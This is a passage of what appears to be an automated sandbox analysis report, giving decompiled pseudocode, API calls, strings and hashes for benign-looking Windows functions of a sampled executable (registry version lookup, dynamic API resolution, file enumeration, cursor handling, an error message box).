				char _v20;
				void* _t13;

				_t13 = E0042DD1C(0, "System\\CurrentControlSet\\Control\\Windows", 0x80000002,  &_v8, 1, 0);
				if(_t13 == 0) {
					_v12 = 4;
					if(RegQueryValueExA(_v8, "CSDVersion", 0,  &_v16,  &_v20,  &_v12) == 0 && _v16 == 4 && _v12 == 4) {
						 *0x49b384 = _v20;
					}
					return RegCloseKey(_v8);
				}
				return _t13;
			}

0x00481b1a
0x00481b21
0x00481b23
0x00481b48
0x00481b5a
0x00481b5a
0x00000000
0x00481b64
0x00481b6c

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481B41
RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00481B64

Strings

System\CurrentControlSet\Control\Windows, xrefs: 00481B0E
CSDVersion, xrefs: 00481B38

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: CSDVersion$System\CurrentControlSet\Control\Windows
API String ID: 3677997916-1910633163
Opcode ID: 39248bbe456b169cc99e3b092f271958bef425fb462f132eb437649bbee1014a
Instruction ID: d4eb2fabfffeea21f828f3fdb10868f6bd1cb5e37b018e891f73b8bc1f729c42
Opcode Fuzzy Hash: 39248bbe456b169cc99e3b092f271958bef425fb462f132eb437649bbee1014a
Instruction Fuzzy Hash: B6F03175E4020CAADF10EAE18C45BAF73BCEB14704F104967E910E7291F678AA058B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0042D894 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042D894(void* __eax) {
				char _v268;
				_Unknown_base(*)()* _t6;
				void* _t9;
				void* _t13;

				_t9 = __eax;
				E00403400(__eax);
				_t6 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemWow64DirectoryA");
				if(_t6 != 0) {
					_t6 =  *_t6( &_v268, 0x105);
					if(_t6 > 0 && _t6 < 0x105) {
						return E0040355C(_t9, 0x105, _t13);
					}
				}
				return _t6;
			}

0x0042d89b
0x0042d89f
0x0042d8b4
0x0042d8bb
0x0042d8c7
0x0042d8cb
0x00000000
0x0042d8dd
0x0042d8cb
0x0042d8e9

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00452EBA,00000000,00452F5D,?,?,00000000,00000000,00000000,00000000,00000000,?,00453229,00000000), ref: 0042D8AE
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D8B4

Strings

GetSystemWow64DirectoryA, xrefs: 0042D8A4
kernel32.dll, xrefs: 0042D8A9

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryA$kernel32.dll
API String ID: 1646373207-4063490227
Opcode ID: e5f508ec5dc001122720bbe4664bdc426e1182a3fdd4e1cf48d1cf9e38e4094c
Instruction ID: 2275d08308b165e9e0622e0b8aed55941db7b7b97042d88504f839f086166f53
Opcode Fuzzy Hash: e5f508ec5dc001122720bbe4664bdc426e1182a3fdd4e1cf48d1cf9e38e4094c
Instruction Fuzzy Hash: C9E04FA1F40B1012D71076BA6C82B5B158D8B84724FA4843B39A4E62C3DEBCD944AE5E

Uniqueness

Uniqueness Score: -1.00%

Function 0042E9A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E0042E9A0(void* __eax) {
				intOrPtr* _t7;
				void* _t8;

				_t8 = __eax;
				_t7 = GetProcAddress(GetModuleHandleA("user32.dll"), "ShutdownBlockReasonDestroy");
				if(_t7 == 0) {
					L2:
					return 0;
				} else {
					_push(_t8);
					if( *_t7() != 0) {
						return 1;
					} else {
						goto L2;
					}
				}
			}

0x0042e9a2
0x0042e9b9
0x0042e9bd
0x0042e9c6
0x0042e9ca
0x0042e9bf
0x0042e9bf
0x0042e9c4
0x0042e9cf
0x00000000
0x00000000
0x00000000
0x0042e9c4

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042E91C), ref: 0042E9AE
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9B4

Strings

user32.dll, xrefs: 0042E9A9
ShutdownBlockReasonDestroy, xrefs: 0042E9A4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: 21c9fa3a2d11ff7284b7675fe2bc2137e574b6faa2fa7b2d94cb811354c27e86
Instruction ID: fe073370cef51c3703db6b7fb7ad7ea86c472328d3868f31f6acb5ff3f9c01d5
Opcode Fuzzy Hash: 21c9fa3a2d11ff7284b7675fe2bc2137e574b6faa2fa7b2d94cb811354c27e86
Instruction Fuzzy Hash: 30D0C7D271177256595175F73CD1AEB018C8D146B53541477F500F5141E65DCC8155AC

Uniqueness

Uniqueness Score: -1.00%

Function 00496C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00496C64() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("user32.dll"), "DisableProcessWindowsGhosting");
				if(_t2 != 0) {
					return  *_t2();
				}
				return _t2;
			}

0x00496c74
0x00496c7b
0x00000000
0x00496c7d
0x00496c7f

APIs

GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00496F3F,00000001,00000000,00496F63), ref: 00496C6E
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496C74

Strings

user32.dll, xrefs: 00496C69
DisableProcessWindowsGhosting, xrefs: 00496C64

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: 36ef3444fa3ca6611e99739fe395530270c8f25b62f63714864b18ed002405a7
Instruction ID: 8660657ad8ffdb3818d4ec5ebda05fdf68863284740220a37be85ac82002cc40
Opcode Fuzzy Hash: 36ef3444fa3ca6611e99739fe395530270c8f25b62f63714864b18ed002405a7
Instruction Fuzzy Hash: 41B00291791741549D6032F20D96A1B0858C8917A9B66057774E8F61C6DD6CA904582D

Uniqueness

Uniqueness Score: -1.00%

Function 00463998 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00463998() {
				_Unknown_base(*)()* _t3;

				E0044AC90();
				_t3 = GetProcAddress(LoadLibraryA("shell32.dll"), "SHPathPrepareForWriteA");
				 *0x49b044 = _t3;
				return _t3;
			}

0x00463998
0x004639ad
0x004639b2
0x004639b7

APIs

Part of subcall function 0044AC90: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EDAD,00496EEE), ref: 0044ACB7
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044ACCF
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044ACE1
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044ACF3
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AD05
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AD17
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AD29
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AD3B
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AD4D
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AD5F
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AD71
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AD83
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AD95
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044ADA7
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044ADB9
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044ADCB
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044ADDD
Part of subcall function 0044AC90: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044ADEF

LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00496F11), ref: 004639A7
GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 004639AD

Strings

SHPathPrepareForWriteA, xrefs: 0046399D
shell32.dll, xrefs: 004639A2

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: SHPathPrepareForWriteA$shell32.dll
API String ID: 2238633743-2683653824
Opcode ID: 87b08c8b6191556c9a0c39310b7190fc6992e2adf9615a07a76443d842a308cd
Instruction ID: d58f98c37e49cf89cd65eb7f8077158a14b36975b6f8973cacb4338f5eeecc27
Opcode Fuzzy Hash: 87b08c8b6191556c9a0c39310b7190fc6992e2adf9615a07a76443d842a308cd
Instruction Fuzzy Hash: 7CB092E0A81B80A19E00FFB22A87A0B10088554B0AB10007F7008B9183EEBC11084D6E

Uniqueness

Uniqueness Score: -1.00%

Function 0047BE38 Relevance: 6.2, APIs: 4, Instructions: 194
fileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E0047BE38(char __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				intOrPtr _v12;
				signed int _v16;
				char _v17;
				signed int _v24;
				char _v28;
				void* _v32;
				struct _WIN32_FIND_DATAA _v352;
				char _v356;
				char _v360;
				intOrPtr _t93;
				signed int _t109;
				int _t112;
				signed int _t129;
				signed char _t131;
				int _t134;
				void* _t144;
				intOrPtr _t172;
				intOrPtr _t184;
				intOrPtr _t188;
				void* _t197;
				void* _t198;
				intOrPtr _t199;

				_t195 = __esi;
				_t194 = __edi;
				_t197 = _t198;
				_t199 = _t198 + 0xfffffe9c;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v24 = 0;
				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v5 = __eax;
				_push(_t197);
				_push(0x47c0fd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_push(_v12);
				_push(_v16);
				_push(_a12);
				E00403634();
				_v17 = 0;
				_t157 =  &_v352;
				_v32 = E00451DC0(_v5,  &_v352, _v24, __eflags);
				if(_v32 == 0xffffffff) {
					_t93 = _a4;
					__eflags =  *(_t93 + 0x50) & 0x00000020;
					if(( *(_t93 + 0x50) & 0x00000020) == 0) {
						goto L21;
					} else {
						E00403494( &_v356, _v12);
						E0040357C( &_v356, _v16);
						E0040357C( &_v356, 0x47c118);
						_v32 = E00451DC0(_v5,  &_v352, _v356, __eflags);
						__eflags = _v32 - 0xffffffff;
						if(_v32 == 0xffffffff) {
							goto L21;
						} else {
							__eflags = 0;
							_push(_t197);
							_push(0x47c0cb);
							_push( *[fs:eax]);
							 *[fs:eax] = _t199;
							do {
								_t109 = E0047BC50( &_v352);
								__eflags = _t109;
								if(_t109 == 0) {
									goto L19;
								} else {
									E00403494( &_v356, _v16);
									E0040355C( &_v360, 0x104,  &(_v352.cFileName));
									E0040357C( &_v356, _v360);
									E0040357C( &_v356, 0x47c124);
									_t129 = E0047BE38(_v5, 0, _v356, _v12, _t194, _t195, __eflags, _a4, _a8, _a12, _a16);
									__eflags = _t129;
									if(_t129 == 0) {
										goto L19;
									} else {
										_v17 = 1;
										E004031BC();
										goto L21;
									}
								}
								goto L22;
								L19:
								_t112 = FindNextFileA(_v32,  &_v352);
								__eflags = _t112;
							} while (_t112 != 0);
							__eflags = 0;
							_pop(_t184);
							 *[fs:eax] = _t184;
							_push(0x47c0d2);
							return FindClose(_v32);
						}
					}
				} else {
					_push(_t197);
					_push(0x47bfa8);
					_push( *[fs:edx]);
					 *[fs:edx] = _t199;
					do {
						_t131 = _v352.dwFileAttributes;
						if((_t131 & 0x00000010) != 0 || _a8 != 0 && (_t131 & 0x00000002) != 0) {
							goto L11;
						} else {
							E0047AA00( *((intOrPtr*)(_a4 + 4)), _t157,  &_v28);
							if(( *(_a4 + 0x4f) & 0x00000010) != 0) {
								__eflags = _v16;
								if(_v16 != 0) {
									E0042C8F8(_v28, _t157,  &_v356);
									_push(_v356);
									_push(_v16);
									E0042C8D0(_v28, _t157,  &_v360);
									_push(_v360);
									E00403634();
								}
							} else {
								_push(_v28);
								_push(_v16);
								E0040355C( &_v356, 0x104,  &(_v352.cFileName));
								_push(_v356);
								E00403634();
							}
							_t144 = E0047BCF0(_v5, 0, _v28, _t194, _t195, _a16);
							_pop(_t157);
							if(_t144 == 0) {
								goto L11;
							} else {
								_v17 = 1;
								E004031BC();
								L21:
								_pop(_t172);
								 *[fs:eax] = _t172;
								_push(0x47c104);
								E00403420( &_v360, 2);
								return E00403420( &_v28, 2);
							}
						}
						goto L22;
						L11:
						_t134 = FindNextFileA(_v32,  &_v352);
						__eflags = _t134;
					} while (_t134 != 0);
					__eflags = 0;
					_pop(_t188);
					 *[fs:eax] = _t188;
					_push(0x47bfaf);
					return FindClose(_v32);
				}
				L22:
			}

0x0047be38
0x0047be38
0x0047be39
0x0047be3b
0x0047be41
0x0047be42
0x0047be43
0x0047be46
0x0047be4c
0x0047be52
0x0047be55
0x0047be58
0x0047be5b
0x0047be5e
0x0047be63
0x0047be64
0x0047be69
0x0047be6c
0x0047be6f
0x0047be72
0x0047be75
0x0047be80
0x0047be85
0x0047be89
0x0047be9a
0x0047bea1
0x0047bfaf
0x0047bfb2
0x0047bfb6
0x00000000
0x0047bfbc
0x0047bfc5
0x0047bfd3
0x0047bfe3
0x0047bffc
0x0047bfff
0x0047c003
0x00000000
0x0047c009
0x0047c009
0x0047c00b
0x0047c00c
0x0047c011
0x0047c014
0x0047c017
0x0047c01d
0x0047c022
0x0047c024
0x00000000
0x0047c026
0x0047c03f
0x0047c055
0x0047c066
0x0047c076
0x0047c087
0x0047c08d
0x0047c08f
0x00000000
0x0047c091
0x0047c091
0x0047c095
0x00000000
0x0047c095
0x0047c08f
0x00000000
0x0047c09c
0x0047c0a7
0x0047c0ac
0x0047c0ac
0x0047c0b4
0x0047c0b6
0x0047c0b9
0x0047c0bc
0x0047c0ca
0x0047c0ca
0x0047c003
0x0047bea7
0x0047bea9
0x0047beaa
0x0047beaf
0x0047beb2
0x0047beb5
0x0047beb5
0x0047bebd
0x00000000
0x0047bed1
0x0047beda
0x0047bee6
0x0047bf19
0x0047bf1d
0x0047bf28
0x0047bf2d
0x0047bf33
0x0047bf3f
0x0047bf44
0x0047bf52
0x0047bf52
0x0047bee8
0x0047bee8
0x0047beeb
0x0047beff
0x0047bf04
0x0047bf12
0x0047bf12
0x0047bf61
0x0047bf66
0x0047bf69
0x00000000
0x0047bf6b
0x0047bf6b
0x0047bf6f
0x0047c0d2
0x0047c0d4
0x0047c0d7
0x0047c0da
0x0047c0ea
0x0047c0fc
0x0047c0fc
0x0047bf69
0x00000000
0x0047bf79
0x0047bf84
0x0047bf89
0x0047bf89
0x0047bf91
0x0047bf93
0x0047bf96
0x0047bf99
0x0047bfa7
0x0047bfa7
0x00000000

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,0047BFA8,?,?,?,?,00000000,0047C0FD,?,00000000,?,00000000,?,0047C251), ref: 0047BF84
FindClose.KERNEL32(000000FF,0047BFAF,0047BFA8,?,?,?,?,00000000,0047C0FD,?,00000000,?,00000000,?,0047C251,00000000), ref: 0047BFA2

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 5f4aeeef1378ccebe157afa90302f682aabd0df19156880c721116b77ec46810
Instruction ID: a402577b2c58905a9d1885d09e8e39d8c358a8e002e7fd7631d24f9962583542
Opcode Fuzzy Hash: 5f4aeeef1378ccebe157afa90302f682aabd0df19156880c721116b77ec46810
Instruction Fuzzy Hash: 0D812C3490024D9FCF11DFA5CC81BDFBBB9EB49304F5084AAE408A7291D7399A46CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00413CE0 Relevance: 6.1, APIs: 4, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00413CE0(intOrPtr* __eax, void* __ecx, signed int __edx) {
				intOrPtr* _t20;
				intOrPtr _t22;
				struct HICON__* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t28;
				struct HWND__* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t34;
				intOrPtr _t43;
				struct HWND__* _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr* _t54;
				void* _t62;
				void* _t71;
				intOrPtr _t72;
				intOrPtr* _t73;
				void* _t79;

				_push(__ecx);
				_t54 = __eax;
				if( *0x49a5f8 != 0) {
					L3:
					if( *0x49a5f8 == 0) {
						_t78 =  *0x49a5fc;
						if( *0x49a5fc != 0) {
							_t43 =  *0x49a5e8; // 0x0
							_t44 = GetDesktopWindow();
							_t45 =  *0x49a5fc; // 0x0
							E00418D50(_t45, _t44, _t78, _t43);
						}
					}
					 *0x49a5f8 = 1;
					_t72 = E00413C88(_t54, _t73);
					_t79 = _t72 -  *0x49a5d8; // 0x0
					if(_t79 != 0) {
						E00413CAC(1);
						 *0x49a5d8 = _t72;
						 *0x49a5dc =  *_t73;
						 *0x49a5ec =  *_t54;
						 *0x49a5f0 =  *((intOrPtr*)(_t54 + 4));
						E00413CAC(0);
					}
					 *0x49a5ec =  *_t54;
					 *0x49a5f0 =  *((intOrPtr*)(_t54 + 4));
					_t62 = E00413CAC(2);
					_t20 =  *0x49a5d0; // 0x0
					_t71 =  *((intOrPtr*)( *_t20 + 4))( *((intOrPtr*)(_t54 + 4)));
					if( *0x49a5fc == 0) {
						_t22 =  *0x49a62c; // 0x2260660
						_t24 = SetCursor(E00423354(_t22, _t71));
					} else {
						if(_t72 == 0 || ( *(_t72 + 0x35) & 0x00000020) != 0) {
							_t25 =  *0x49a5fc; // 0x0
							E00418CFC(_t25, _t71);
							_t27 =  *0x49a5fc; // 0x0
							_t84 =  *((char*)(_t27 + 0x44));
							if( *((char*)(_t27 + 0x44)) != 0) {
								_t28 =  *0x49a5fc; // 0x0
								_t24 = E00418E34(_t28,  *((intOrPtr*)(_t54 + 4)),  *_t54, __eflags);
							} else {
								_t30 = GetDesktopWindow();
								_t31 =  *0x49a5fc; // 0x0
								_t24 = E00418D50(_t31, _t30, _t84,  *((intOrPtr*)(_t54 + 4)));
							}
						} else {
							_t32 =  *0x49a5fc; // 0x0
							E00418EA8(_t32, _t62, __eflags);
							_t34 =  *0x49a62c; // 0x2260660
							_t24 = SetCursor(E00423354(_t34, _t71));
						}
					}
					L16:
					return _t24;
				}
				_t47 =  *0x49a5e4; // 0x0
				asm("cdq");
				if((_t47 -  *__eax ^ __edx) - __edx >= 5) {
					goto L3;
				}
				_t51 =  *0x49a5e8; // 0x0
				asm("cdq");
				_t24 = (_t51 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				if(_t24 < 5) {
					goto L16;
				}
				goto L3;
			}

0x00413ce3
0x00413ce4
0x00413ced
0x00413d16
0x00413d1d
0x00413d1f
0x00413d26
0x00413d28
0x00413d2e
0x00413d3b
0x00413d40
0x00413d40
0x00413d26
0x00413d45
0x00413d55
0x00413d57
0x00413d5d
0x00413d61
0x00413d66
0x00413d6f
0x00413d76
0x00413d7f
0x00413d87
0x00413d87
0x00413d8e
0x00413d97
0x00413da8
0x00413dac
0x00413db6
0x00413dbf
0x00413e2e
0x00413e39
0x00413dc1
0x00413dc3
0x00413dcd
0x00413dd2
0x00413dd7
0x00413ddc
0x00413de0
0x00413e00
0x00413e05
0x00413de2
0x00413de6
0x00413def
0x00413df4
0x00413df4
0x00413e0c
0x00413e0c
0x00413e11
0x00413e19
0x00413e24
0x00413e24
0x00413dc3
0x00413e3e
0x00413e42
0x00413e42
0x00413cef
0x00413cf6
0x00413cfe
0x00000000
0x00000000
0x00413d00
0x00413d08
0x00413d0b
0x00413d10
0x00000000
0x00000000
0x00000000

APIs

GetDesktopWindow.USER32 ref: 00413D2E
GetDesktopWindow.USER32 ref: 00413DE6

Part of subcall function 00418EA8: 6F55B5E0.COMCTL32(?,00000000,00413FAB,00000000,004140BB,?,?,0049A628), ref: 00418EC4
Part of subcall function 00418EA8: ShowCursor.USER32(00000001,?,00000000,00413FAB,00000000,004140BB,?,?,0049A628), ref: 00418EE1

SetCursor.USER32(00000000,?,?,?,?,00413ADB,00000000,00413AEE), ref: 00413E24

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CursorDesktopWindow$Show
String ID:
API String ID: 2074268717-0
Opcode ID: d952c8c129c069f382cd386b7de7329279eaed5a8884da675d8caadbd4d77934
Instruction ID: ece583def3ae3bec66251b8eb53a3083707ce0208ac3aa2b878898e1aeac743c
Opcode Fuzzy Hash: d952c8c129c069f382cd386b7de7329279eaed5a8884da675d8caadbd4d77934
Instruction Fuzzy Hash: A1414C75700250AFCB10EF39E984B5677E1AB68325B16807BE404CB365DB38DD91CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408A34 Relevance: 6.1, APIs: 4, Instructions: 95
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408A34(intOrPtr* __eax, void* __edx, void* __eflags) {
				char _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				char* _v304;
				char _v308;
				char _v312;
				char _v568;
				char _v632;
				char _v636;
				char _v696;
				void* __edi;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t38;
				struct HINSTANCE__* _t49;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t75;
				void* _t76;

				_t75 = __edx;
				_t74 = __eax;
				_t29 =  *0x49a014; // 0x400000
				GetModuleFileNameA(_t29,  &_v568, 0x100);
				E0040735C(_t76, 0x3f, E004074A0( &_v568, 0x5c) + 1);
				_t62 = 0x408bb0;
				_t73 = 0x408bb0;
				if(E00402BA0(_t74, 0x4063e0) != 0) {
					_t62 = E00403738( *((intOrPtr*)(_t74 + 4)));
					_t61 = E004072A0(_t62, 0x408bb0);
					if(_t61 != 0 &&  *((char*)(_t62 + _t61 - 1)) != 0x2e) {
						_t73 = 0x408bb4;
					}
				}
				_t38 =  *0x49a014; // 0x400000
				LoadStringA(_t38, 0xff9e,  &_v632, 0x40);
				E00402AA0( *_t74,  &_v272);
				_v312 =  &_v272;
				_v308 = 4;
				_v304 =  &_v696;
				_v300 = 6;
				_v296 = E00408A28(_t75);
				_v292 = 5;
				_v288 = _t62;
				_v284 = 6;
				_v280 = _t73;
				_v276 = 6;
				E004078A0( &_v568,  &_v312,  &_v632, 4);
				_t49 =  *0x49a014; // 0x400000
				LoadStringA(_t49, 0xff9f,  &_v636, 0x40);
				if( *0x49a035 == 0) {
					return MessageBoxA(0,  &_v568,  &_v632, 0x2010);
				} else {
					E0040500C(0x49a208,  &_v568);
					return E00402708(E00404F8F(),  &_v312,  &_v568);
				}
			}

0x00408a3e
0x00408a40
0x00408a4f
0x00408a55
0x00408a72
0x00408a77
0x00408a7c
0x00408a8f
0x00408a99
0x00408a9d
0x00408aa4
0x00408aad
0x00408aad
0x00408aa4
0x00408abe
0x00408ac4
0x00408ad4
0x00408ae0
0x00408ae7
0x00408af3
0x00408afa
0x00408b09
0x00408b10
0x00408b18
0x00408b1f
0x00408b27
0x00408b2e
0x00408b48
0x00408b59
0x00408b5f
0x00408b6b
0x00000000
0x00408b6d
0x00408b79
0x00000000
0x00408b83

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A55
LoadStringA.USER32 ref: 00408AC4
LoadStringA.USER32 ref: 00408B5F
MessageBoxA.USER32 ref: 00408B9E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
